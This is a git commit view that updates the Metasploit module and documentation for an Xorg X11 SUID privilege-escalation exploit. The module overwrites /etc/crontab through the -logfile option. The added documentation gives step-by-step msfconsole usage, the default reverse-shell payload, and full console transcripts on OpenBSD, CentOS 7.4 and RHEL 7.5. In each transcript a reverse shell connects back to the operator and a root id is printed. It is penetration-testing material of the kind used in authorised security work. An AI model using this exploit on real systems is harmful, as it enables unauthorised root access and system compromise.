Browse Source

Update tested versions

Brendan Coles 4 months ago
parent
commit
163c66b5ba

+ 113
- 15
documentation/modules/exploit/multi/local/xorg_x11_suid_server.md View File

@@ -1,40 +1,37 @@
1 1
 ## Description
2 2
 
3
-  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.        
3
+  This module attempts to gain root privileges using Xorg X11 server versions 1.19.0 < 1.20.3 set as SUID.  A permission check flaw exists for -modulepath and -logfile options when starting Xorg.  This flaw allows users to write over existing files on the system.  This exploit backs up crontab and then uses -logfile to overwrite it.  A command to be run is set for the Font Path argument -fp which will be logged and ran by cron.
4 4
 
5 5
 
6 6
 ## Vulnerable Application
7 7
 
8
-  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
8
+  Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.
9 9
 
10
-  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.  
10
+  Xorg is more restrictive to exploit under CentOS / RHEL.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.
11 11
 
12 12
   This module has been tested successfully on:
13 13
 
14 14
   * OpenBSD 6.3
15 15
   * OpenBSD 6.4
16
+  * CentOS 7.4.1708 x86_64
16 17
   * CentOS 7.5.1084 x86_64
18
+  * Red Hat Enterprise Linux 7.5 x86_64
17 19
 
18 20
 
19 21
 ## Verification Steps
20
-  On CentOS your session must have console lock.  To get a console lock you can login locally with a user.  
22
+
23
+  On CentOS/RHEL your session must have console lock.  To get a console lock you can login locally with a user.
21 24
 
22 25
   1. Start `msfconsole`
23 26
   2. Get a session
24 27
   3. Do: `use exploit/multi/local/xorg_x11_suid_server`
25
-  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)   
28
+  4. Do: Set a payload/target or use default(cmd/unix/reverse_openssl)
26 29
   5. Do: `set SESSION [SESSION]`
27 30
   6. Do: `set LHOST [LHOST]`
28 31
   7. Do: `run`
29 32
   8. You should get a new *root* session
30 33
 
31 34
 
32
-## Options
33
-
34
-  **SESSION**
35
-
36
-  Which session to use, which can be viewed with `sessions`
37
-
38 35
 ## Advanced Options
39 36
 
40 37
   **Xdisplay**
@@ -43,19 +40,25 @@
43 40
 
44 41
   **WritableDir**
45 42
 
46
-  A writable directory file system path. (default: `/tmp`)
43
+  A writable directory file system path (default: `/tmp`)
47 44
 
48
-
49
-   **ConsoleLock**
45
+  **ConsoleLock**
50 46
    
51
-  Will check for console lock under linux  (default: `true`)
47
+  Will check for console lock under linux (default: `true`)
52 48
 
53 49
 
54 50
 ## Scenarios
55 51
 
52
+### OpenBSD
53
+
56 54
 ```
55
+msf5 > use exploit/multi/local/xorg_x11_suid_server
57 56
 msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
58 57
 session => 1
58
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.30.0.2
59
+lhost => 172.30.0.2
60
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
61
+verbose => true
59 62
 msf5 exploit(multi/local/xorg_x11_suid_server) > run
60 63
 
61 64
 [!] SESSION may not be compatible with this module.
@@ -89,3 +92,98 @@ msf5 exploit(multi/local/xorg_x11_suid_server) > run
89 92
 id
90 93
 uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)
91 94
 ```
95
+
96
+### CentOS 7.4.1708 x86_64
97
+
98
+```
99
+msf5 > use exploit/multi/local/xorg_x11_suid_server
100
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
101
+session => 1
102
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
103
+lhost => 172.16.191.165
104
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
105
+verbose => true
106
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
107
+
108
+[*] Started reverse double SSL handler on 172.16.191.188:4444 
109
+[*] Running additional check for Linux
110
+[+] Console lock for user
111
+[+] Selinux is not an issue
112
+[+] Xorg path found at /usr/bin/Xorg
113
+[+] Xorg binary /usr/bin/Xorg is SUID
114
+[+] Xorg version 1.19.3 is vulnerable
115
+[!] Xorg in process list
116
+[!] Could not get version or Xorg process possibly running, may fail
117
+[+] Passed all initial checks for exploit
118
+[*] Uploading your payload, this could take a while
119
+[*] Trying /etc/crontab overwrite
120
+[+] /etc/crontab overwrite successful
121
+[*] Waiting on cron to run
122
+[*] Accepted the first client connection...
123
+[*] Accepted the second client connection...
124
+[*] Command: echo zk0jobDMxFdBxLBU;
125
+[*] Writing to socket A
126
+[*] Writing to socket B
127
+[*] Reading from sockets...
128
+[*] Reading from socket A
129
+[*] A: "zk0jobDMxFdBxLBU\n"
130
+[*] Matching...
131
+[*] B is input...
132
+[*] Command shell session 7 opened (172.16.191.188:4444 -> 172.16.191.141:46318) at 2018-11-24 21:31:04 -0500
133
+[*] Waiting on cron to run
134
+[+] Returning session after cleaning
135
+[+] Deleted /tmp/.session-Tafw0iW0r8
136
+
137
+id
138
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
139
+uname -a
140
+Linux centos-7-1708.localdomain 3.10.0-693.el7.x86_64 #1 SMP Tue Aug 22 21:09:27 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
141
+```
142
+
143
+### Red Hat Enterprise Linux 7.5 x86_64
144
+
145
+```
146
+msf5 > use exploit/multi/local/xorg_x11_suid_server
147
+msf5 exploit(multi/local/xorg_x11_suid_server) > set session 1
148
+session => 1
149
+msf5 exploit(multi/local/xorg_x11_suid_server) > set lhost 172.16.191.165
150
+lhost => 172.16.191.165
151
+msf5 exploit(multi/local/xorg_x11_suid_server) > set verbose true
152
+verbose => true
153
+msf5 exploit(multi/local/xorg_x11_suid_server) > run
154
+
155
+[*] Started reverse double SSL handler on 172.16.191.165:4444 
156
+[*] Running additional check for Linux
157
+[+] Console lock for user
158
+[+] Selinux is not an issue
159
+[+] Xorg path found at /usr/bin/Xorg
160
+[+] Xorg binary /usr/bin/Xorg is SUID
161
+[+] Xorg version 1.19.5 is vulnerable
162
+[!] Xorg in process list
163
+[!] Could not get version or Xorg process possibly running, may fail
164
+[+] Passed all initial checks for exploit
165
+[*] Uploading your payload, this could take a while
166
+[*] Trying /etc/crontab overwrite
167
+[*] Accepted the first client connection...
168
+[*] Accepted the second client connection...
169
+[*] Command: echo EEdPp66R4es6U3WF;
170
+[*] Writing to socket A
171
+[*] Writing to socket B
172
+[*] Reading from sockets...
173
+[+] /etc/crontab overwrite successful. Waiting for job to run (may take a minute)...
174
+[*] Reading from socket B
175
+[*] B: "EEdPp66R4es6U3WF\n"
176
+[*] Matching...
177
+[*] A is input...
178
+[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.228:44978) at 2019-04-21 06:29:04 -0400
179
+[+] Returning session after cleaning
180
+[+] Deleted /tmp/.session-aqxyug0fH
181
+
182
+id
183
+uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_t:s0-s0:c0.c1023
184
+uname -a
185
+Linux red-hat-7-5-x64.local 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
186
+cat /etc/redhat-release
187
+Red Hat Enterprise Linux Server release 7.5 (Maipo)
188
+```
189
+

+ 14
- 9
modules/exploits/multi/local/xorg_x11_suid_server.rb View File

@@ -5,6 +5,7 @@
5 5
 
6 6
 class MetasploitModule < Msf::Exploit::Local
7 7
   Rank = GoodRanking
8
+
8 9
   include Msf::Exploit::EXE
9 10
   include Msf::Exploit::FileDropper
10 11
   include Msf::Post::File
@@ -13,21 +14,25 @@ class MetasploitModule < Msf::Exploit::Local
13 14
 
14 15
   def initialize(info = {})
15 16
     super(update_info(info,
16
-      'Name'           => 'Xorg X11 Server SUID privilege escalation',
17
+      'Name'           => 'Xorg X11 Server SUID logfile Privilege Escalation',
17 18
       'Description'    => %q{
18 19
         This module attempts to gain root privileges with SUID Xorg X11 server
19 20
         versions 1.19.0 < 1.20.3.
20 21
 
21 22
         A permission check flaw exists for -modulepath and -logfile options when
22
-        starting Xorg.  This allows unprivileged users that can start the server
23
+        starting Xorg. This allows unprivileged users that can start the server
23 24
         the ability to elevate privileges and run arbitrary code under root
24 25
         privileges.
25 26
 
26
-        This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
27
-        CentOS default install will require console auth for the users session.
28
-        Cron launches the payload so if Selinux is enforcing exploitation
27
+        This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and
28
+        CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS
29
+        and RHEL systems requires console auth for the user's session to start
30
+        the Xorg server.
31
+
32
+        Cron launches the payload, so if SELinux is enforcing, exploitation
29 33
         may still be possible, but the module will bail.
30
-        Xorg must have SUID permissions and may not start if running.
34
+
35
+        Xorg must have SUID permissions and may not start if already running.
31 36
 
32 37
         On exploitation a crontab.old backup file will be created by Xorg.
33 38
         This module will remove the .old file and restore crontab after
@@ -41,7 +46,7 @@ class MetasploitModule < Msf::Exploit::Local
41 46
           'Narendra Shinde', # Discovery and exploit
42 47
           'Raptor - 0xdea',  # Modified exploit for cron
43 48
           'Aaron Ringo',     # Metasploit module
44
-          'bcoles' # Metasploit module
49
+          'bcoles'           # Metasploit module
45 50
         ],
46 51
       'DisclosureDate' => 'Oct 25 2018',
47 52
       'References'     =>
@@ -80,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Local
80 85
        [
81 86
          OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
82 87
          OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
83
-         OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
88
+         OptBool.new('ConsoleLock', [ true, 'Will check for console lock on linux systems', true ])
84 89
        ]
85 90
      )
86 91
   end
@@ -168,7 +173,7 @@ class MetasploitModule < Msf::Exploit::Local
168 173
     check_status = check
169 174
     if check_status == CheckCode::Appears
170 175
       print_warning 'Could not get version or Xorg process possibly running, may fail'
171
-    elsif check_status ==  CheckCode::Safe
176
+    elsif check_status == CheckCode::Safe
172 177
       fail_with Failure::NotVulnerable, 'Target not vulnerable'
173 178
     end
174 179
 

Loading…
Cancel
Save